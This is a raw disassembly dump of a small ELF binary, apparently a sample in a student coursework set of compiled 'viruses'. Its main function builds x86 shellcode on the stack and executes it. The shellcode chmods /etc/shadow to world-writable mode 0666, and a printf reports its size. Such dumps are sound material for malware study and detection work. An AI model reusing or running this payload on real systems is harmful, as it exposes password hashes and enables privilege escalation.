
/home/stas/Coursach/Выборки/compiled/viruses/13551:     формат файла elf32-i386


Дизассемблирование раздела .interp:

08048154 <.interp>:
 8048154:	2f                   	das    
 8048155:	6c                   	insb   (%dx),%es:(%edi)
 8048156:	69 62 2f 6c 64 2d 6c 	imul   $0x6c2d646c,0x2f(%edx),%esp
 804815d:	69 6e 75 78 2e 73 6f 	imul   $0x6f732e78,0x75(%esi),%ebp
 8048164:	2e 32 00             	xor    %cs:(%eax),%al

Дизассемблирование раздела .note.ABI-tag:

08048168 <.note.ABI-tag>:
 8048168:	04 00                	add    $0x0,%al
 804816a:	00 00                	add    %al,(%eax)
 804816c:	10 00                	adc    %al,(%eax)
 804816e:	00 00                	add    %al,(%eax)
 8048170:	01 00                	add    %eax,(%eax)
 8048172:	00 00                	add    %al,(%eax)
 8048174:	47                   	inc    %edi
 8048175:	4e                   	dec    %esi
 8048176:	55                   	push   %ebp
 8048177:	00 00                	add    %al,(%eax)
 8048179:	00 00                	add    %al,(%eax)
 804817b:	00 02                	add    %al,(%edx)
 804817d:	00 00                	add    %al,(%eax)
 804817f:	00 06                	add    %al,(%esi)
 8048181:	00 00                	add    %al,(%eax)
 8048183:	00 18                	add    %bl,(%eax)
 8048185:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .note.gnu.build-id:

08048188 <.note.gnu.build-id>:
 8048188:	04 00                	add    $0x0,%al
 804818a:	00 00                	add    %al,(%eax)
 804818c:	14 00                	adc    $0x0,%al
 804818e:	00 00                	add    %al,(%eax)
 8048190:	03 00                	add    (%eax),%eax
 8048192:	00 00                	add    %al,(%eax)
 8048194:	47                   	inc    %edi
 8048195:	4e                   	dec    %esi
 8048196:	55                   	push   %ebp
 8048197:	00 b5 67 ed 70 ea    	add    %dh,-0x158f1299(%ebp)
 804819d:	23 1a                	and    (%edx),%ebx
 804819f:	56                   	push   %esi
 80481a0:	0a 80 7b 75 a8 79    	or     0x79a8757b(%eax),%al
 80481a6:	24 17                	and    $0x17,%al
 80481a8:	3a                   	.byte 0x3a
 80481a9:	8b                   	.byte 0x8b
 80481aa:	8b e7                	mov    %edi,%esp

Дизассемблирование раздела .gnu.hash:

080481ac <.gnu.hash>:
 80481ac:	02 00                	add    (%eax),%al
 80481ae:	00 00                	add    %al,(%eax)
 80481b0:	05 00 00 00 01       	add    $0x1000000,%eax
 80481b5:	00 00                	add    %al,(%eax)
 80481b7:	00 05 00 00 00 00    	add    %al,0x0
 80481bd:	20 00                	and    %al,(%eax)
 80481bf:	20 00                	and    %al,(%eax)
 80481c1:	00 00                	add    %al,(%eax)
 80481c3:	00 05 00 00 00 ad    	add    %al,0xad000000
 80481c9:	4b                   	dec    %ebx
 80481ca:	e3 c0                	jecxz  804818c <_init-0x16c>

Дизассемблирование раздела .dynsym:

080481cc <.dynsym>:
	...
 80481dc:	2b 00                	sub    (%eax),%eax
	...
 80481e6:	00 00                	add    %al,(%eax)
 80481e8:	12 00                	adc    (%eax),%al
 80481ea:	00 00                	add    %al,(%eax)
 80481ec:	1a 00                	sbb    (%eax),%al
	...
 80481f6:	00 00                	add    %al,(%eax)
 80481f8:	12 00                	adc    (%eax),%al
 80481fa:	00 00                	add    %al,(%eax)
 80481fc:	44                   	inc    %esp
	...
 8048205:	00 00                	add    %al,(%eax)
 8048207:	00 20                	add    %ah,(%eax)
 8048209:	00 00                	add    %al,(%eax)
 804820b:	00 32                	add    %dh,(%edx)
	...
 8048215:	00 00                	add    %al,(%eax)
 8048217:	00 12                	add    %dl,(%edx)
 8048219:	00 00                	add    %al,(%eax)
 804821b:	00 0b                	add    %cl,(%ebx)
 804821d:	00 00                	add    %al,(%eax)
 804821f:	00 8c 85 04 08 04 00 	add    %cl,0x40804(%ebp,%eax,4)
 8048226:	00 00                	add    %al,(%eax)
 8048228:	11 00                	adc    %eax,(%eax)
 804822a:	0f                   	.byte 0xf
	...

Дизассемблирование раздела .dynstr:

0804822c <.dynstr>:
 804822c:	00 6c 69 62          	add    %ch,0x62(%ecx,%ebp,2)
 8048230:	63 2e                	arpl   %bp,(%esi)
 8048232:	73 6f                	jae    80482a3 <_init-0x55>
 8048234:	2e 36 00 5f 49       	cs add %bl,%cs:%ss:0x49(%edi)
 8048239:	4f                   	dec    %edi
 804823a:	5f                   	pop    %edi
 804823b:	73 74                	jae    80482b1 <_init-0x47>
 804823d:	64 69 6e 5f 75 73 65 	imul   $0x64657375,%fs:0x5f(%esi),%ebp
 8048244:	64 
 8048245:	00 5f 5f             	add    %bl,0x5f(%edi)
 8048248:	73 74                	jae    80482be <_init-0x3a>
 804824a:	61                   	popa   
 804824b:	63 6b 5f             	arpl   %bp,0x5f(%ebx)
 804824e:	63 68 6b             	arpl   %bp,0x6b(%eax)
 8048251:	5f                   	pop    %edi
 8048252:	66 61                	popaw  
 8048254:	69 6c 00 70 72 69 6e 	imul   $0x746e6972,0x70(%eax,%eax,1),%ebp
 804825b:	74 
 804825c:	66                   	data16
 804825d:	00 5f 5f             	add    %bl,0x5f(%edi)
 8048260:	6c                   	insb   (%dx),%es:(%edi)
 8048261:	69 62 63 5f 73 74 61 	imul   $0x6174735f,0x63(%edx),%esp
 8048268:	72 74                	jb     80482de <_init-0x1a>
 804826a:	5f                   	pop    %edi
 804826b:	6d                   	insl   (%dx),%es:(%edi)
 804826c:	61                   	popa   
 804826d:	69 6e 00 5f 5f 67 6d 	imul   $0x6d675f5f,0x0(%esi),%ebp
 8048274:	6f                   	outsl  %ds:(%esi),(%dx)
 8048275:	6e                   	outsb  %ds:(%esi),(%dx)
 8048276:	5f                   	pop    %edi
 8048277:	73 74                	jae    80482ed <_init-0xb>
 8048279:	61                   	popa   
 804827a:	72 74                	jb     80482f0 <_init-0x8>
 804827c:	5f                   	pop    %edi
 804827d:	5f                   	pop    %edi
 804827e:	00 47 4c             	add    %al,0x4c(%edi)
 8048281:	49                   	dec    %ecx
 8048282:	42                   	inc    %edx
 8048283:	43                   	inc    %ebx
 8048284:	5f                   	pop    %edi
 8048285:	32 2e                	xor    (%esi),%ch
 8048287:	34 00                	xor    $0x0,%al
 8048289:	47                   	inc    %edi
 804828a:	4c                   	dec    %esp
 804828b:	49                   	dec    %ecx
 804828c:	42                   	inc    %edx
 804828d:	43                   	inc    %ebx
 804828e:	5f                   	pop    %edi
 804828f:	32 2e                	xor    (%esi),%ch
 8048291:	30 00                	xor    %al,(%eax)

Дизассемблирование раздела .gnu.version:

08048294 <.gnu.version>:
 8048294:	00 00                	add    %al,(%eax)
 8048296:	02 00                	add    (%eax),%al
 8048298:	03 00                	add    (%eax),%eax
 804829a:	00 00                	add    %al,(%eax)
 804829c:	02 00                	add    (%eax),%al
 804829e:	01 00                	add    %eax,(%eax)

Дизассемблирование раздела .gnu.version_r:

080482a0 <.gnu.version_r>:
 80482a0:	01 00                	add    %eax,(%eax)
 80482a2:	02 00                	add    (%eax),%al
 80482a4:	01 00                	add    %eax,(%eax)
 80482a6:	00 00                	add    %al,(%eax)
 80482a8:	10 00                	adc    %al,(%eax)
 80482aa:	00 00                	add    %al,(%eax)
 80482ac:	00 00                	add    %al,(%eax)
 80482ae:	00 00                	add    %al,(%eax)
 80482b0:	14 69                	adc    $0x69,%al
 80482b2:	69 0d 00 00 03 00 53 	imul   $0x53,0x30000,%ecx
 80482b9:	00 00 00 
 80482bc:	10 00                	adc    %al,(%eax)
 80482be:	00 00                	add    %al,(%eax)
 80482c0:	10 69 69             	adc    %ch,0x69(%ecx)
 80482c3:	0d 00 00 02 00       	or     $0x20000,%eax
 80482c8:	5d                   	pop    %ebp
 80482c9:	00 00                	add    %al,(%eax)
 80482cb:	00 00                	add    %al,(%eax)
 80482cd:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .rel.dyn:

080482d0 <.rel.dyn>:
 80482d0:	fc                   	cld    
 80482d1:	9f                   	lahf   
 80482d2:	04 08                	add    $0x8,%al
 80482d4:	06                   	push   %es
 80482d5:	03 00                	add    (%eax),%eax
	...

Дизассемблирование раздела .rel.plt:

080482d8 <.rel.plt>:
 80482d8:	0c a0                	or     $0xa0,%al
 80482da:	04 08                	add    $0x8,%al
 80482dc:	07                   	pop    %es
 80482dd:	01 00                	add    %eax,(%eax)
 80482df:	00 10                	add    %dl,(%eax)
 80482e1:	a0 04 08 07 02       	mov    0x2070804,%al
 80482e6:	00 00                	add    %al,(%eax)
 80482e8:	14 a0                	adc    $0xa0,%al
 80482ea:	04 08                	add    $0x8,%al
 80482ec:	07                   	pop    %es
 80482ed:	03 00                	add    (%eax),%eax
 80482ef:	00 18                	add    %bl,(%eax)
 80482f1:	a0 04 08 07 04       	mov    0x4070804,%al
	...

Дизассемблирование раздела .init:

080482f8 <_init>:
 80482f8:	53                   	push   %ebx
 80482f9:	83 ec 08             	sub    $0x8,%esp
 80482fc:	e8 9f 00 00 00       	call   80483a0 <__x86.get_pc_thunk.bx>
 8048301:	81 c3 ff 1c 00 00    	add    $0x1cff,%ebx
 8048307:	8b 83 fc ff ff ff    	mov    -0x4(%ebx),%eax
 804830d:	85 c0                	test   %eax,%eax
 804830f:	74 05                	je     8048316 <_init+0x1e>
 8048311:	e8 3a 00 00 00       	call   8048350 <__gmon_start__@plt>
 8048316:	83 c4 08             	add    $0x8,%esp
 8048319:	5b                   	pop    %ebx
 804831a:	c3                   	ret    

Дизассемблирование раздела .plt:

08048320 <printf@plt-0x10>:
 8048320:	ff 35 04 a0 04 08    	pushl  0x804a004
 8048326:	ff 25 08 a0 04 08    	jmp    *0x804a008
 804832c:	00 00                	add    %al,(%eax)
	...

08048330 <printf@plt>:
 8048330:	ff 25 0c a0 04 08    	jmp    *0x804a00c
 8048336:	68 00 00 00 00       	push   $0x0
 804833b:	e9 e0 ff ff ff       	jmp    8048320 <_init+0x28>

08048340 <__stack_chk_fail@plt>:
 8048340:	ff 25 10 a0 04 08    	jmp    *0x804a010
 8048346:	68 08 00 00 00       	push   $0x8
 804834b:	e9 d0 ff ff ff       	jmp    8048320 <_init+0x28>

08048350 <__gmon_start__@plt>:
 8048350:	ff 25 14 a0 04 08    	jmp    *0x804a014
 8048356:	68 10 00 00 00       	push   $0x10
 804835b:	e9 c0 ff ff ff       	jmp    8048320 <_init+0x28>

08048360 <__libc_start_main@plt>:
 8048360:	ff 25 18 a0 04 08    	jmp    *0x804a018
 8048366:	68 18 00 00 00       	push   $0x18
 804836b:	e9 b0 ff ff ff       	jmp    8048320 <_init+0x28>

Дизассемблирование раздела .text:

08048370 <_start>:
 8048370:	31 ed                	xor    %ebp,%ebp
 8048372:	5e                   	pop    %esi
 8048373:	89 e1                	mov    %esp,%ecx
 8048375:	83 e4 f0             	and    $0xfffffff0,%esp
 8048378:	50                   	push   %eax
 8048379:	54                   	push   %esp
 804837a:	52                   	push   %edx
 804837b:	68 70 85 04 08       	push   $0x8048570
 8048380:	68 00 85 04 08       	push   $0x8048500
 8048385:	51                   	push   %ecx
 8048386:	56                   	push   %esi
 8048387:	68 6d 84 04 08       	push   $0x804846d
 804838c:	e8 cf ff ff ff       	call   8048360 <__libc_start_main@plt>
 8048391:	f4                   	hlt    
 8048392:	66 90                	xchg   %ax,%ax
 8048394:	66 90                	xchg   %ax,%ax
 8048396:	66 90                	xchg   %ax,%ax
 8048398:	66 90                	xchg   %ax,%ax
 804839a:	66 90                	xchg   %ax,%ax
 804839c:	66 90                	xchg   %ax,%ax
 804839e:	66 90                	xchg   %ax,%ax

080483a0 <__x86.get_pc_thunk.bx>:
 80483a0:	8b 1c 24             	mov    (%esp),%ebx
 80483a3:	c3                   	ret    
 80483a4:	66 90                	xchg   %ax,%ax
 80483a6:	66 90                	xchg   %ax,%ax
 80483a8:	66 90                	xchg   %ax,%ax
 80483aa:	66 90                	xchg   %ax,%ax
 80483ac:	66 90                	xchg   %ax,%ax
 80483ae:	66 90                	xchg   %ax,%ax

080483b0 <deregister_tm_clones>:
 80483b0:	b8 27 a0 04 08       	mov    $0x804a027,%eax
 80483b5:	2d 24 a0 04 08       	sub    $0x804a024,%eax
 80483ba:	83 f8 06             	cmp    $0x6,%eax
 80483bd:	77 01                	ja     80483c0 <deregister_tm_clones+0x10>
 80483bf:	c3                   	ret    
 80483c0:	b8 00 00 00 00       	mov    $0x0,%eax
 80483c5:	85 c0                	test   %eax,%eax
 80483c7:	74 f6                	je     80483bf <deregister_tm_clones+0xf>
 80483c9:	55                   	push   %ebp
 80483ca:	89 e5                	mov    %esp,%ebp
 80483cc:	83 ec 18             	sub    $0x18,%esp
 80483cf:	c7 04 24 24 a0 04 08 	movl   $0x804a024,(%esp)
 80483d6:	ff d0                	call   *%eax
 80483d8:	c9                   	leave  
 80483d9:	c3                   	ret    
 80483da:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi

080483e0 <register_tm_clones>:
 80483e0:	b8 24 a0 04 08       	mov    $0x804a024,%eax
 80483e5:	2d 24 a0 04 08       	sub    $0x804a024,%eax
 80483ea:	c1 f8 02             	sar    $0x2,%eax
 80483ed:	89 c2                	mov    %eax,%edx
 80483ef:	c1 ea 1f             	shr    $0x1f,%edx
 80483f2:	01 d0                	add    %edx,%eax
 80483f4:	d1 f8                	sar    %eax
 80483f6:	75 01                	jne    80483f9 <register_tm_clones+0x19>
 80483f8:	c3                   	ret    
 80483f9:	ba 00 00 00 00       	mov    $0x0,%edx
 80483fe:	85 d2                	test   %edx,%edx
 8048400:	74 f6                	je     80483f8 <register_tm_clones+0x18>
 8048402:	55                   	push   %ebp
 8048403:	89 e5                	mov    %esp,%ebp
 8048405:	83 ec 18             	sub    $0x18,%esp
 8048408:	89 44 24 04          	mov    %eax,0x4(%esp)
 804840c:	c7 04 24 24 a0 04 08 	movl   $0x804a024,(%esp)
 8048413:	ff d2                	call   *%edx
 8048415:	c9                   	leave  
 8048416:	c3                   	ret    
 8048417:	89 f6                	mov    %esi,%esi
 8048419:	8d bc 27 00 00 00 00 	lea    0x0(%edi,%eiz,1),%edi

08048420 <__do_global_dtors_aux>:
 8048420:	80 3d 24 a0 04 08 00 	cmpb   $0x0,0x804a024
 8048427:	75 13                	jne    804843c <__do_global_dtors_aux+0x1c>
 8048429:	55                   	push   %ebp
 804842a:	89 e5                	mov    %esp,%ebp
 804842c:	83 ec 08             	sub    $0x8,%esp
 804842f:	e8 7c ff ff ff       	call   80483b0 <deregister_tm_clones>
 8048434:	c6 05 24 a0 04 08 01 	movb   $0x1,0x804a024
 804843b:	c9                   	leave  
 804843c:	f3 c3                	repz ret 
 804843e:	66 90                	xchg   %ax,%ax

08048440 <frame_dummy>:
 8048440:	a1 10 9f 04 08       	mov    0x8049f10,%eax
 8048445:	85 c0                	test   %eax,%eax
 8048447:	74 1f                	je     8048468 <frame_dummy+0x28>
 8048449:	b8 00 00 00 00       	mov    $0x0,%eax
 804844e:	85 c0                	test   %eax,%eax
 8048450:	74 16                	je     8048468 <frame_dummy+0x28>
 8048452:	55                   	push   %ebp
 8048453:	89 e5                	mov    %esp,%ebp
 8048455:	83 ec 18             	sub    $0x18,%esp
 8048458:	c7 04 24 10 9f 04 08 	movl   $0x8049f10,(%esp)
 804845f:	ff d0                	call   *%eax
 8048461:	c9                   	leave  
 8048462:	e9 79 ff ff ff       	jmp    80483e0 <register_tm_clones>
 8048467:	90                   	nop
 8048468:	e9 73 ff ff ff       	jmp    80483e0 <register_tm_clones>

0804846d <main>:
 804846d:	55                   	push   %ebp
 804846e:	89 e5                	mov    %esp,%ebp
 8048470:	83 e4 f0             	and    $0xfffffff0,%esp
 8048473:	83 ec 40             	sub    $0x40,%esp
 8048476:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
 804847c:	89 44 24 3c          	mov    %eax,0x3c(%esp)
 8048480:	31 c0                	xor    %eax,%eax
 8048482:	c7 44 24 1a 31 c0 50 	movl   $0x6850c031,0x1a(%esp)
 8048489:	68 
 804848a:	c7 44 24 1e 61 64 6f 	movl   $0x776f6461,0x1e(%esp)
 8048491:	77 
 8048492:	c7 44 24 22 68 2f 2f 	movl   $0x732f2f68,0x22(%esp)
 8048499:	73 
 804849a:	c7 44 24 26 68 68 2f 	movl   $0x652f6868,0x26(%esp)
 80484a1:	65 
 80484a2:	c7 44 24 2a 74 63 89 	movl   $0xe3896374,0x2a(%esp)
 80484a9:	e3 
 80484aa:	c7 44 24 2e 66 68 b6 	movl   $0x1b66866,0x2e(%esp)
 80484b1:	01 
 80484b2:	c7 44 24 32 59 b0 0f 	movl   $0xcd0fb059,0x32(%esp)
 80484b9:	cd 
 80484ba:	c7 44 24 36 80 b0 01 	movl   $0xcd01b080,0x36(%esp)
 80484c1:	cd 
 80484c2:	66 c7 44 24 3a 80 00 	movw   $0x80,0x3a(%esp)
 80484c9:	c7 44 24 04 21 00 00 	movl   $0x21,0x4(%esp)
 80484d0:	00 
 80484d1:	c7 04 24 90 85 04 08 	movl   $0x8048590,(%esp)
 80484d8:	e8 53 fe ff ff       	call   8048330 <printf@plt>
 80484dd:	8d 44 24 1a          	lea    0x1a(%esp),%eax
 80484e1:	ff d0                	call   *%eax
 80484e3:	b8 00 00 00 00       	mov    $0x0,%eax
 80484e8:	8b 54 24 3c          	mov    0x3c(%esp),%edx
 80484ec:	65 33 15 14 00 00 00 	xor    %gs:0x14,%edx
 80484f3:	74 05                	je     80484fa <main+0x8d>
 80484f5:	e8 46 fe ff ff       	call   8048340 <__stack_chk_fail@plt>
 80484fa:	c9                   	leave  
 80484fb:	c3                   	ret    
 80484fc:	66 90                	xchg   %ax,%ax
 80484fe:	66 90                	xchg   %ax,%ax

08048500 <__libc_csu_init>:
 8048500:	55                   	push   %ebp
 8048501:	57                   	push   %edi
 8048502:	31 ff                	xor    %edi,%edi
 8048504:	56                   	push   %esi
 8048505:	53                   	push   %ebx
 8048506:	e8 95 fe ff ff       	call   80483a0 <__x86.get_pc_thunk.bx>
 804850b:	81 c3 f5 1a 00 00    	add    $0x1af5,%ebx
 8048511:	83 ec 1c             	sub    $0x1c,%esp
 8048514:	8b 6c 24 30          	mov    0x30(%esp),%ebp
 8048518:	8d b3 0c ff ff ff    	lea    -0xf4(%ebx),%esi
 804851e:	e8 d5 fd ff ff       	call   80482f8 <_init>
 8048523:	8d 83 08 ff ff ff    	lea    -0xf8(%ebx),%eax
 8048529:	29 c6                	sub    %eax,%esi
 804852b:	c1 fe 02             	sar    $0x2,%esi
 804852e:	85 f6                	test   %esi,%esi
 8048530:	74 27                	je     8048559 <__libc_csu_init+0x59>
 8048532:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi
 8048538:	8b 44 24 38          	mov    0x38(%esp),%eax
 804853c:	89 2c 24             	mov    %ebp,(%esp)
 804853f:	89 44 24 08          	mov    %eax,0x8(%esp)
 8048543:	8b 44 24 34          	mov    0x34(%esp),%eax
 8048547:	89 44 24 04          	mov    %eax,0x4(%esp)
 804854b:	ff 94 bb 08 ff ff ff 	call   *-0xf8(%ebx,%edi,4)
 8048552:	83 c7 01             	add    $0x1,%edi
 8048555:	39 f7                	cmp    %esi,%edi
 8048557:	75 df                	jne    8048538 <__libc_csu_init+0x38>
 8048559:	83 c4 1c             	add    $0x1c,%esp
 804855c:	5b                   	pop    %ebx
 804855d:	5e                   	pop    %esi
 804855e:	5f                   	pop    %edi
 804855f:	5d                   	pop    %ebp
 8048560:	c3                   	ret    
 8048561:	eb 0d                	jmp    8048570 <__libc_csu_fini>
 8048563:	90                   	nop
 8048564:	90                   	nop
 8048565:	90                   	nop
 8048566:	90                   	nop
 8048567:	90                   	nop
 8048568:	90                   	nop
 8048569:	90                   	nop
 804856a:	90                   	nop
 804856b:	90                   	nop
 804856c:	90                   	nop
 804856d:	90                   	nop
 804856e:	90                   	nop
 804856f:	90                   	nop

08048570 <__libc_csu_fini>:
 8048570:	f3 c3                	repz ret 

Дизассемблирование раздела .fini:

08048574 <_fini>:
 8048574:	53                   	push   %ebx
 8048575:	83 ec 08             	sub    $0x8,%esp
 8048578:	e8 23 fe ff ff       	call   80483a0 <__x86.get_pc_thunk.bx>
 804857d:	81 c3 83 1a 00 00    	add    $0x1a83,%ebx
 8048583:	83 c4 08             	add    $0x8,%esp
 8048586:	5b                   	pop    %ebx
 8048587:	c3                   	ret    

Дизассемблирование раздела .rodata:

08048588 <_fp_hw>:
 8048588:	03 00                	add    (%eax),%eax
	...

0804858c <_IO_stdin_used>:
 804858c:	01 00                	add    %eax,(%eax)
 804858e:	02 00                	add    (%eax),%al
 8048590:	5b                   	pop    %ebx
 8048591:	2a 5d 20             	sub    0x20(%ebp),%bl
 8048594:	53                   	push   %ebx
 8048595:	68 65 6c 6c 43       	push   $0x436c6c65
 804859a:	6f                   	outsl  %ds:(%esi),(%dx)
 804859b:	64 65 20 73 69       	fs and %dh,%fs:%gs:0x69(%ebx)
 80485a0:	7a 65                	jp     8048607 <_IO_stdin_used+0x7b>
 80485a2:	20 28                	and    %ch,(%eax)
 80485a4:	62 79 74             	bound  %edi,0x74(%ecx)
 80485a7:	65                   	gs
 80485a8:	73 29                	jae    80485d3 <_IO_stdin_used+0x47>
 80485aa:	3a 20                	cmp    (%eax),%ah
 80485ac:	25 64 0a 0a 00       	and    $0xa0a64,%eax

Дизассемблирование раздела .eh_frame_hdr:

080485b4 <.eh_frame_hdr>:
 80485b4:	01 1b                	add    %ebx,(%ebx)
 80485b6:	03 3b                	add    (%ebx),%edi
 80485b8:	28 00                	sub    %al,(%eax)
 80485ba:	00 00                	add    %al,(%eax)
 80485bc:	04 00                	add    $0x0,%al
 80485be:	00 00                	add    %al,(%eax)
 80485c0:	6c                   	insb   (%dx),%es:(%edi)
 80485c1:	fd                   	std    
 80485c2:	ff                   	(bad)  
 80485c3:	ff 44 00 00          	incl   0x0(%eax,%eax,1)
 80485c7:	00 b9 fe ff ff 68    	add    %bh,0x68fffffe(%ecx)
 80485cd:	00 00                	add    %al,(%eax)
 80485cf:	00 4c ff ff          	add    %cl,-0x1(%edi,%edi,8)
 80485d3:	ff 88 00 00 00 bc    	decl   -0x44000000(%eax)
 80485d9:	ff                   	(bad)  
 80485da:	ff                   	(bad)  
 80485db:	ff c4                	inc    %esp
 80485dd:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .eh_frame:

080485e0 <__FRAME_END__-0xac>:
 80485e0:	14 00                	adc    $0x0,%al
 80485e2:	00 00                	add    %al,(%eax)
 80485e4:	00 00                	add    %al,(%eax)
 80485e6:	00 00                	add    %al,(%eax)
 80485e8:	01 7a 52             	add    %edi,0x52(%edx)
 80485eb:	00 01                	add    %al,(%ecx)
 80485ed:	7c 08                	jl     80485f7 <_IO_stdin_used+0x6b>
 80485ef:	01 1b                	add    %ebx,(%ebx)
 80485f1:	0c 04                	or     $0x4,%al
 80485f3:	04 88                	add    $0x88,%al
 80485f5:	01 00                	add    %eax,(%eax)
 80485f7:	00 20                	add    %ah,(%eax)
 80485f9:	00 00                	add    %al,(%eax)
 80485fb:	00 1c 00             	add    %bl,(%eax,%eax,1)
 80485fe:	00 00                	add    %al,(%eax)
 8048600:	20 fd                	and    %bh,%ch
 8048602:	ff                   	(bad)  
 8048603:	ff 50 00             	call   *0x0(%eax)
 8048606:	00 00                	add    %al,(%eax)
 8048608:	00 0e                	add    %cl,(%esi)
 804860a:	08 46 0e             	or     %al,0xe(%esi)
 804860d:	0c 4a                	or     $0x4a,%al
 804860f:	0f 0b                	ud2    
 8048611:	74 04                	je     8048617 <_IO_stdin_used+0x8b>
 8048613:	78 00                	js     8048615 <_IO_stdin_used+0x89>
 8048615:	3f                   	aas    
 8048616:	1a 3b                	sbb    (%ebx),%bh
 8048618:	2a 32                	sub    (%edx),%dh
 804861a:	24 22                	and    $0x22,%al
 804861c:	1c 00                	sbb    $0x0,%al
 804861e:	00 00                	add    %al,(%eax)
 8048620:	40                   	inc    %eax
 8048621:	00 00                	add    %al,(%eax)
 8048623:	00 49 fe             	add    %cl,-0x2(%ecx)
 8048626:	ff                   	(bad)  
 8048627:	ff 8f 00 00 00 00    	decl   0x0(%edi)
 804862d:	41                   	inc    %ecx
 804862e:	0e                   	push   %cs
 804862f:	08 85 02 42 0d 05    	or     %al,0x50d4202(%ebp)
 8048635:	02 8b c5 0c 04 04    	add    0x4040cc5(%ebx),%cl
 804863b:	00 38                	add    %bh,(%eax)
 804863d:	00 00                	add    %al,(%eax)
 804863f:	00 60 00             	add    %ah,0x0(%eax)
 8048642:	00 00                	add    %al,(%eax)
 8048644:	bc fe ff ff 61       	mov    $0x61fffffe,%esp
 8048649:	00 00                	add    %al,(%eax)
 804864b:	00 00                	add    %al,(%eax)
 804864d:	41                   	inc    %ecx
 804864e:	0e                   	push   %cs
 804864f:	08 85 02 41 0e 0c    	or     %al,0xc0e4102(%ebp)
 8048655:	87 03                	xchg   %eax,(%ebx)
 8048657:	43                   	inc    %ebx
 8048658:	0e                   	push   %cs
 8048659:	10 86 04 41 0e 14    	adc    %al,0x140e4104(%esi)
 804865f:	83 05 4e 0e 30 02 48 	addl   $0x48,0x2300e4e
 8048666:	0e                   	push   %cs
 8048667:	14 41                	adc    $0x41,%al
 8048669:	c3                   	ret    
 804866a:	0e                   	push   %cs
 804866b:	10 41 c6             	adc    %al,-0x3a(%ecx)
 804866e:	0e                   	push   %cs
 804866f:	0c 41                	or     $0x41,%al
 8048671:	c7                   	(bad)  
 8048672:	0e                   	push   %cs
 8048673:	08 41 c5             	or     %al,-0x3b(%ecx)
 8048676:	0e                   	push   %cs
 8048677:	04 10                	add    $0x10,%al
 8048679:	00 00                	add    %al,(%eax)
 804867b:	00 9c 00 00 00 f0 fe 	add    %bl,-0x1100000(%eax,%eax,1)
 8048682:	ff                   	(bad)  
 8048683:	ff 02                	incl   (%edx)
 8048685:	00 00                	add    %al,(%eax)
 8048687:	00 00                	add    %al,(%eax)
 8048689:	00 00                	add    %al,(%eax)
	...

0804868c <__FRAME_END__>:
 804868c:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .init_array:

08049f08 <__frame_dummy_init_array_entry>:
 8049f08:	40                   	inc    %eax
 8049f09:	84 04 08             	test   %al,(%eax,%ecx,1)

Дизассемблирование раздела .fini_array:

08049f0c <__do_global_dtors_aux_fini_array_entry>:
 8049f0c:	20                   	.byte 0x20
 8049f0d:	84 04 08             	test   %al,(%eax,%ecx,1)

Дизассемблирование раздела .jcr:

08049f10 <__JCR_END__>:
 8049f10:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .dynamic:

08049f14 <_DYNAMIC>:
 8049f14:	01 00                	add    %eax,(%eax)
 8049f16:	00 00                	add    %al,(%eax)
 8049f18:	01 00                	add    %eax,(%eax)
 8049f1a:	00 00                	add    %al,(%eax)
 8049f1c:	0c 00                	or     $0x0,%al
 8049f1e:	00 00                	add    %al,(%eax)
 8049f20:	f8                   	clc    
 8049f21:	82                   	(bad)  
 8049f22:	04 08                	add    $0x8,%al
 8049f24:	0d 00 00 00 74       	or     $0x74000000,%eax
 8049f29:	85 04 08             	test   %eax,(%eax,%ecx,1)
 8049f2c:	19 00                	sbb    %eax,(%eax)
 8049f2e:	00 00                	add    %al,(%eax)
 8049f30:	08 9f 04 08 1b 00    	or     %bl,0x1b0804(%edi)
 8049f36:	00 00                	add    %al,(%eax)
 8049f38:	04 00                	add    $0x0,%al
 8049f3a:	00 00                	add    %al,(%eax)
 8049f3c:	1a 00                	sbb    (%eax),%al
 8049f3e:	00 00                	add    %al,(%eax)
 8049f40:	0c 9f                	or     $0x9f,%al
 8049f42:	04 08                	add    $0x8,%al
 8049f44:	1c 00                	sbb    $0x0,%al
 8049f46:	00 00                	add    %al,(%eax)
 8049f48:	04 00                	add    $0x0,%al
 8049f4a:	00 00                	add    %al,(%eax)
 8049f4c:	f5                   	cmc    
 8049f4d:	fe                   	(bad)  
 8049f4e:	ff 6f ac             	ljmp   *-0x54(%edi)
 8049f51:	81 04 08 05 00 00 00 	addl   $0x5,(%eax,%ecx,1)
 8049f58:	2c 82                	sub    $0x82,%al
 8049f5a:	04 08                	add    $0x8,%al
 8049f5c:	06                   	push   %es
 8049f5d:	00 00                	add    %al,(%eax)
 8049f5f:	00 cc                	add    %cl,%ah
 8049f61:	81 04 08 0a 00 00 00 	addl   $0xa,(%eax,%ecx,1)
 8049f68:	67 00 00             	add    %al,(%bx,%si)
 8049f6b:	00 0b                	add    %cl,(%ebx)
 8049f6d:	00 00                	add    %al,(%eax)
 8049f6f:	00 10                	add    %dl,(%eax)
 8049f71:	00 00                	add    %al,(%eax)
 8049f73:	00 15 00 00 00 00    	add    %dl,0x0
 8049f79:	00 00                	add    %al,(%eax)
 8049f7b:	00 03                	add    %al,(%ebx)
 8049f7d:	00 00                	add    %al,(%eax)
 8049f7f:	00 00                	add    %al,(%eax)
 8049f81:	a0 04 08 02 00       	mov    0x20804,%al
 8049f86:	00 00                	add    %al,(%eax)
 8049f88:	20 00                	and    %al,(%eax)
 8049f8a:	00 00                	add    %al,(%eax)
 8049f8c:	14 00                	adc    $0x0,%al
 8049f8e:	00 00                	add    %al,(%eax)
 8049f90:	11 00                	adc    %eax,(%eax)
 8049f92:	00 00                	add    %al,(%eax)
 8049f94:	17                   	pop    %ss
 8049f95:	00 00                	add    %al,(%eax)
 8049f97:	00 d8                	add    %bl,%al
 8049f99:	82                   	(bad)  
 8049f9a:	04 08                	add    $0x8,%al
 8049f9c:	11 00                	adc    %eax,(%eax)
 8049f9e:	00 00                	add    %al,(%eax)
 8049fa0:	d0 82 04 08 12 00    	rolb   0x120804(%edx)
 8049fa6:	00 00                	add    %al,(%eax)
 8049fa8:	08 00                	or     %al,(%eax)
 8049faa:	00 00                	add    %al,(%eax)
 8049fac:	13 00                	adc    (%eax),%eax
 8049fae:	00 00                	add    %al,(%eax)
 8049fb0:	08 00                	or     %al,(%eax)
